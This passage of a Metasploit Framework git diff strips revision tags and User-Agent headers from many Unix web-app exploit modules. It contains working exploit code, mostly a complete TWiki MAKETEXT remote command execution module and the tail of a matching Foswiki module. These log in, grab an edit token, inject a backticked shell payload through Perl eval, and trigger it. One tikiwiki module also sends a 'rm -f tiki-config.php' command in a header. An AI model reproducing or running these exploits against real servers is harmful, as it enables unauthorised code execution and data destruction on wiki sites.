<< '/' if @base[-1, 1] != '/' + + res = send_request_cgi({ + 'uri' => "#{@base}System/WebHome" + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + if res.body =~ /This site is running Foswiki version.*Foswiki-(\d\.\d\.\d)/ + version = $1 + print_status("Version found: #{version}") + if version <= "1.1.6" + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + return Exploit::CheckCode::Detected + end + + + def exploit + + # Init variables + @page = '' + + if datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty? + @page << '/' if datastore['FoswikiPage'][0] != '/' + @page << datastore['FoswikiPage'] + else + @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}" + end + + @base = target_uri.path + @base << '/' if @base[-1, 1] != '/' + + # Login if needed + if (datastore['USERNAME'] and + not datastore['USERNAME'].empty? and + datastore['PASSWORD'] and + not datastore['PASSWORD'].empty?) + print_status("Trying login to get session ID...") + session = do_login(datastore['USERNAME'], datastore['PASSWORD']) + else + print_status("Using anonymous access...") + session = "" + end + + if not session + fail_with(Exploit::Failure::Unknown, "Error getting a session ID") + end + + # Inject payload + print_status("Trying to inject the payload on #{@page}...") + res = inject_code(session, payload.encoded) + if not res or res !~ /#{@page}/ + fail_with(Exploit::Failure::Unknown, "Error injecting the payload") + end + + # Execute payload + print_status("Executing the payload through #{@page}...") + res = send_request_cgi({ + 'uri' => "#{@base}#{@page}", + 'cookie' => "FOSWIKISID=#{session}" + }) + if not res or res.code != 200 or res.body !~ /HASH/ + print_status("#{res.code}\n#{res.body}") + fail_with(Exploit::Failure::Unknown, "Error executing the payload") + end + + print_good("Exploitation was successful") + + end + +end + +=begin + +* Trigger: + +%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% + +=end + diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index a6b4d7ac29..64f44cdeb1 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], 'Privileged' => false, 'Payload' => diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 70ccbff297..1611b9ff2a 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-3757'], diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 51a0a1d8f6..c298c6f418 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-1053' ], diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 309e0c39d0..cdb132c5d9 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spinbad ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-4908'], diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index 956d414116..bc0b0983a1 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2905' ], diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index c32f16a4d6..56675b2f2c 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 68f1769e5d..e33c230a4e 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'tdz', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '49993' ], diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index 302b664d5d..87fe6e5e0e 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2288' ], diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index 157f23d70f..4606ba9cd5 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Valerio Tesei ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2773'], diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 445a8fcbe6..9382f18e03 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4098' ], diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 52cd4fa554..9865c8716b 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585} diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 6980a05d00..5613c667a9 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'egypt' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60018' ], diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index f3f7e7fca5..f0de4a8ebd 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1551'], diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index bb75c80e6c..46de6cd341 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'egypt' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], 'Privileged' => false, 'Platform' => ['php'], diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index d8985d25e4..d6d59178ac 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'cazz' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0511' ], diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb index e14d898a7f..aac6754e20 100644 --- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb +++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['EDB', '18991'], diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb index 3812aefaba..e793025eec 100644 --- a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb +++ b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'str0ke ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2612'], diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index eab6532dff..341324be22 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1921'], diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 39252dba39..cf373af75f 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2086'], diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index fc5bc113a5..00ec94d57e 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'egypt' # metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1151' ], diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 8f86aefe2a..31ee74043e 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '10562'], diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index bbf6c12be1..aabc21e54f 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #Phenoelit 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-4929'], diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 25159683ff..15f633be60 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2733'], diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index 23389e3f7c..11f7fa5398 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote Only "cmd/unix/generic" payloads were tested. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Nicob ' ], 'References' => [ diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 5362ed117f..bff07ae5d0 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'sinn3r' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0694' ], diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 05d9b5c4ba..50486cf5f9 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-5423'], diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index 05fd0f40e0..10d24721cf 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-4602'], @@ -65,12 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw( { 'uri' => datastore['URI'] + "/tiki-index.php", - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', - 'Connection' => 'Close', - } + 'method' => 'GET' }, 25) http_fingerprint({ :response => res }) # check method @@ -150,7 +140,6 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data, 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a', 'Connection' => 'Close', } @@ -171,7 +160,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'CLIENT-IP' => "#{cmd};", 'Connection' => 'Close', } @@ -201,7 +189,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'CLIENT-IP' => 'rm -f tiki-config.php', 'Connection' => 'Close', } diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index c013b2ca94..5d097ed9fc 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0911' ], diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 23ea4e04d5..339caadd9d 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => ['chao-mu'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB' => '50421'], diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 6f57d9c253..9f3376e79f 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2877' ], diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb new file mode 100644 index 0000000000..e1b43c3098 --- /dev/null +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -0,0 +1,230 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TWiki MAKETEXT Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a + specially crafted MAKETEXT, a malicious user can execute shell commands since user + input is passed to the Perl "eval" command without first being sanitized. The + problem is caused by an underlying security issue in the CPAN:Locale::Maketext + module. This works in TWiki sites that have user interface localization enabled + (UserInterfaceInternationalisation variable set). + + If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, + if the 'TwikiPage' option isn't provided, the module will try to create a random + page on the SandBox space. The modules has been tested successfully on + TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine. + }, + 'Author' => + [ + 'George Clark', # original discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6329' ], + [ 'OSVDB', '88460' ], + [ 'BID', '56950' ], + [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ] + ], + 'Privileged' => false, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 1024, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic ruby python bash telnet' + } + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Dec 15 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]), + OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]), + OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), + OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) + ], self.class) + end + + def do_login(username, password) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}do/login", + 'vars_post' => + { + 'username' => username, + 'password' => password + } + }) + + if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + return nil + end + + session = $1 + return session + end + + def inject_code(session, code) + + vprint_status("Retrieving the crypttoken...") + + res = send_request_cgi({ + 'uri' => "#{@base}do/edit#{@page}", + 'cookie' => "TWIKISID=#{session}", + 'vars_get' => + { + 'nowysiwyg' => '1' + } + }) + + if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/ + vprint_error("Error retrieving the crypttoken") + return nil + end + + crypttoken = $1 + vprint_good("crypttoken found: #{crypttoken}") + + if session.empty? + if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + session = $1 + else + vprint_error("Error using anonymous access") + return nil + end + end + + vprint_status("Injecting the payload...") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}do/save#{@page}", + 'cookie' => "TWIKISID=#{session}", + 'vars_post' => + { + 'crypttoken' => crypttoken, + 'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%" + } + }) + + if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/ + print_warning("Error injecting the payload") + print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}" + return nil + end + + location = URI(res.headers['Location']).path + print_good("Payload injected on #{location}") + + return location + end + + def check + @base = target_uri.path + @base << '/' if @base[-1, 1] != '/' + + res = send_request_cgi({ + 'uri' => "#{@base}do/view/TWiki/WebHome" + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + if res.body =~ /This site is running TWiki version.*TWiki-(\d\.\d\.\d)/ + version = $1 + print_status("Version found: #{version}") + if version < "5.1.3" + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + return Exploit::CheckCode::Detected + end + + + def exploit + + # Init variables + @page = '' + + if datastore['TwikiPage'] and not datastore['TwikiPage'].empty? + @page << '/' if datastore['TwikiPage'][0] != '/' + @page << datastore['TwikiPage'] + else + @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}" + end + + @base = target_uri.path + @base << '/' if @base[-1, 1] != '/' + + # Login if needed + if (datastore['USERNAME'] and + not datastore['USERNAME'].empty? and + datastore['PASSWORD'] and + not datastore['PASSWORD'].empty?) + print_status("Trying login to get session ID...") + session = do_login(datastore['USERNAME'], datastore['PASSWORD']) + else + print_status("Using anonymous access...") + session = "" + end + + if not session + fail_with(Exploit::Failure::Unknown, "Error getting a session ID") + end + + # Inject payload + print_status("Trying to inject the payload on #{@page}...") + res = inject_code(session, payload.encoded) + if not res + fail_with(Exploit::Failure::Unknown, "Error injecting the payload") + end + + # Execute payload + print_status("Executing the payload through #{res}...") + res = send_request_cgi({ + 'uri' => res, + 'cookie' => "TWIKISID=#{session}" + }) + if not res or res.code != 200 or res.body !~ /HASH/ + fail_with(Exploit::Failure::Unknown, "Error executing the payload") + end + + print_good("Exploitation was successful") + + end + +end + +=begin + +* Trigger: + +%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% + +=end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 076195f93b..69b19fb733 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1037' ], diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb new file mode 100644 index 0000000000..6b4776f6e4 --- /dev/null +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -0,0 +1,98 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', + 'Description' => %q{ + This module exploits a remote file inclusion flaw in the WordPress blogging + software plugin known as Advanced Custom Fields. The vulnerability allows for remote + file inclusion and remote code execution via the export.php script. The Advanced + Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only + works when the php option allow_url_include is set to On (Default Off). + }, + 'Author' => + 